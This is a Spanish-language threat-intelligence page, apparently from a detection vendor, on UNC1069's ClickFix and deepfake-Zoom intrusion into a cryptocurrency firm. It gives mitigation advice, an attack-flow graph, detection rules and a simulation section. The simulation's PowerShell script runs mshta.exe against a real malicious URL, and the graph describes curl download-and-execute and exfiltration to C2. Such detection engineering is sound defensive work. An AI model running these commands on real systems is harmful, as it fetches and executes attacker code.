UNC1069 Apunta al Sector de Criptomonedas con Nuevas Herramientas e Ingeniería Social Activada por IA
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
UNC1069, vinculado a Corea del Norte, apuntó a una empresa de tecnología financiera de criptomonedas mediante una intrusión de múltiples etapas que combinó video deepfake generado por IA, cuentas de Telegram comprometidas y una reunión falsa de Zoom para inducir a las víctimas a ejecutar comandos maliciosos.
Investigación
Mandiant identificó siete familias de malware en un host macOS, incluidas las recién observadas SILENCELIFT, DEEPBREATH y CHROMEPUSH, además del conocido descargador SUGARLOADER. La cadena comenzó con un comando estilo ClickFix que obtuvo una carga útil de un dominio malicioso, luego pasó por cargadores y puertas traseras que robaron credenciales, datos de navegador y contenido de mensajería. Las etapas posteriores utilizaron ejecución modular residente en memoria para minimizar las huellas en disco.
Mitigación
Fortalecer la verificación a través de canales de ingeniería social, restringir la ejecución de scripts sin firmar y monitorizar el uso anómalo de curl o mshta. En macOS, hacer cumplir el control de la firma de código y de los demonios de lanzamiento, y auditar los permisos de TCC y los directorios de host de mensajería nativa para archivos desconocidos.
Respuesta
Aislar el punto final, preservar los artefactos de la línea de comandos, recuperar el plist del demonio de lanzamiento malicioso y bloquear todos los dominios C2 identificados. Restablecer llavero, credenciales de navegador y Telegram, y completar un barrido para cargaradores residuales. Revisar cuentas afectadas por acceso no autorizado y coordinar el confinamiento.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Acción</b> – <b>T1204.001 Ejecución de Usuario</b>: Enlace malicioso entregado a través de cuenta de Telegram comprometida y reunión de Zoom suplantada<br/><b>Descripción</b>: La víctima copió y ejecutó cadenas de comandos"] class action_initial_access action tool_telegram["<b>Herramienta</b> – <b>Nombre</b>: Telegram (comprometido)<br/><b>Rol</b>: Canal de entrega para enlace malicioso"] class tool_telegram tool tool_zoom["<b>Herramienta</b> – <b>Nombre</b>: Zoom (reunión suplantada)<br/><b>Rol</b>: Vector de ingeniería social"] class tool_zoom tool action_execution_unix_shell["<b>Acción</b> – <b>T1059.004 Shell Unix</b>: Ejecutar comando curl a través de zsh para descargar WAVESHAPER<br/><b>Descripción</b>: Descarga y ejecuta puerta trasera"] class action_execution_unix_shell action tool_curl["<b>Herramienta</b> – <b>Nombre</b>: curl<br/><b>Propósito</b>: Recuperar carga útil remota"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Nombre</b>: WAVESHAPER<br/><b>Función</b>: Puerta trasera descargada y ejecutada"] class malware_waveshaper malware action_execution_mshta["<b>Acción</b> – <b>T1218.005 Ejecución de Proxy Mshta</b>: Usar mshta para recuperar y ejecutar el descargador HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Herramienta</b> – <b>Nombre</b>: mshta<br/><b>Propósito</b>: Ejecutar aplicación HTML remota"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Nombre</b>: HYPERCALL<br/><b>Función</b>: Descargador ejecutado a través de mshta"] class malware_hypercall malware process_launch_daemon["<b>Proceso</b> – <b>T1543.004 Demonio de Lanzamiento</b>: com.apple.system.updater<br/><b>Propósito</b>: Ejecuta SUGARLOADER al inicio del sistema"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Nombre</b>: SUGARLOADER<br/><b>Función</b>: Componente persistente"] class malware_sugarloader malware action_defense_evasion["<b>Acción</b> – <b>T1027.004 Compilar Después de la Entrega</b>: Cifrar configuración con RC4 para ocultar URLs C2"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Nombre</b>: DEEPBREATH<br/><b>Capacidades</b>: Acceder a Keychain y depósitos de navegador"] class malware_deepbreath malware action_cred_keychain["<b>Acción</b> – <b>T1555.001 Keychain</b>: Extraer credenciales de Keychain de macOS"] class action_cred_keychain action action_cred_browser["<b>Acción</b> – <b>T1555.003 Navegadores Web</b>: Extraer cookies, inicios de sesión, extensiones de Chrome, Brave, Edge"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Nombre</b>: CHROMEPUSH<br/><b>Capacidad</b>: Keylogger de extensión de navegador"] class malware_chromepush malware action_keylogging["<b>Acción</b> – <b>T1056.001 Keylogging</b>: Capturar pulsaciones de teclas a través de extensión maliciosa"] class action_keylogging action action_local_staging["<b>Acción</b> – <b>T1074.001 Preparación de Datos Locales</b>: Almacenar datos recopilados en directorios temporales"] class action_local_staging action action_remote_staging["<b>Acción</b> – <b>T1074.002 Preparación de Datos Remotos</b>: Subir datos preparados a C2 usando curl"] class action_remote_staging action action_c2_http["<b>Acción</b> – <b>T1102.003 Servicio Web Oneu2011Way</b>: Enviar datos exfiltrados vía HTTP POST"] class action_c2_http action action_exfiltration["<b>Acción</b> – <b>T1020 Exfiltración Automatizada</b>: Carga automatizada de datos a servidores C2"] class action_exfiltration action %% Connections action_initial_access –>|usa| tool_telegram tool_telegram –>|entrega enlace a| tool_zoom tool_zoom –>|conduce a| action_execution_unix_shell action_execution_unix_shell –>|ejecuta| tool_curl tool_curl –>|descarga| malware_waveshaper malware_waveshaper –>|detona| action_defense_evasion action_initial_access –>|también detona| action_execution_mshta action_execution_mshta –>|usa| tool_mshta tool_mshta –>|recupera| malware_hypercall malware_hypercall –>|instala| process_launch_daemon process_launch_daemon –>|inicia| malware_sugarloader malware_sugarloader –>|carga| malware_deepbreath malware_deepbreath –>|realiza| action_cred_keychain malware_deepbreath –>|realiza| action_cred_browser malware_deepbreath –>|instala| malware_chromepush malware_chromepush –>|ejecuta| action_keylogging action_keylogging –>|almacena datos en| action_local_staging action_local_staging –>|sube vía curl a| action_remote_staging action_remote_staging –>|envía datos a| action_c2_http action_c2_http –>|facilita| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Flujo de Ataque
Detecciones
Posible Intento de Enumeración System_profiler (vía creación de proceso)
Ver
Comportamiento de Evasión de Defensa Suspicious LOLBAS MSHTA al Detectar Comandos Asociados (vía creación de proceso)
Ver
Posible Intento de Enumeración de Actualizaciones de Sistema (vía creación de proceso)
Ver
Intento de Ejecución Suspicious de Curl [MacOS] (vía cmdline)
Ver
PnPtUtil para Enumeración de Dispositivos (vía cmdline)
Ver
Posible Enumeración del Sistema (vía cmdline)
Ver
IOCs (HashMd5) para detectar: UNC1069 Enfoca el Sector de Criptomonedas con Nuevas Herramientas e Ingeniería Social Habilitada por IA
Ver
IOCs (HashSha256) para detectar: UNC1069 Enfoca el Sector de Criptomonedas con Nuevas Herramientas e Ingeniería Social Habilitada por IA
Ver
Vector de Infección de UNC1069 MacOS a través de ClickFix [Creación de Proceso Linux]
Ver
Ejecución de Comando de Ataque ClickFix de UNC1069 [Creación de Proceso Windows]
Ver
Ejecución de Simulación
Preámbulo: Es necesario que haya pasado la verificación de Telemetría y Línea Base anterior.
Razón: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y narrativas deben reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque & Comandos:
El adversario, habiendo obtenido acceso inicial a través de un correo electrónico de phishing, aprovechamshtapara buscar una Aplicación HTML Maliciosa desdehttps://mylingocoin.com/audio/fix/6454694440. Este archivo HTA contiene una carga útil de PowerShell que instala un minero de cripto minería. Antes de lanzar el HTA, el atacante ejecutasetx audio_volume 100para asegurar que el subsistema de audio está en un estado conocido (algunas variantes de la campaña ClickFix manipulan configuraciones de audio para ocultar ventanas emergentes). Ambos comandos se ejecutan directamente en una consola de PowerShell, produciendo campos de CommandLine que coinciden exactamente con la regla Sigma. -
Script de Prueba de Regresión:
# Simulación de Ataque ClickFix de UNC1069 – activa regla Sigma # Paso 1: Persistir una variable de entorno con apariencia benigna (coincide con detección) setx audio_volume 100 # Paso 2: Ejecutar HTA malicioso – URL exacta utilizada en la detección de reglas $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Opcional: esperar unos segundos para que se lance el HTA Start-Sleep -Seconds 5 -
Comandos de Limpieza:
# Eliminar la variable de entorno configurada anteriormente reg delete "HKCUEnvironment" /v "audio_volume" /f # Terminar cualquier proceso mshta remanente iniciado por la prueba Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force